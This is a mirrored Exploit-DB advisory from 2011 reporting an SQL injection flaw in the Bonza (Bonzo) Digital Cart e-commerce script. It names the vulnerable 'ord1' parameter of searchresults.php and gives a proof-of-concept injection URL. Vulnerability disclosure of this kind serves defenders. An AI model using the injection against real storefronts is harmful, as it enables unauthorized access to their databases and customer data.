Bonza Digital Cart Script – SQL Injection

• Exploit Database
• 97 阅读

• 作者： Eyup CELIK
  日期： 2011-08-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17709/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

  # Exploit Title: Bonzo Cart (E-Commerce System) SQL Injection # Date: 2011 # Author: Eyup CELIK # Software Link: http://www.turnkeycentral.com # Version: All Version # Tested on: All versions are Vulnerability   ISSUE   SQL Injection can be done using the command input   Example searchresults.php?ord1=<SQL Injection Code>&ord2=asc&search1=&SearchTerm=&where=ItemName   Exploit: searchresults.php?ord1=&apos;1&ord2=asc&search1=&SearchTerm=&where=ItemName   Demo: http://site.com/bonzacart/searchresults.php?ord1=&apos;1&ord2=asc&search1=&SearchTerm=&where=ItemName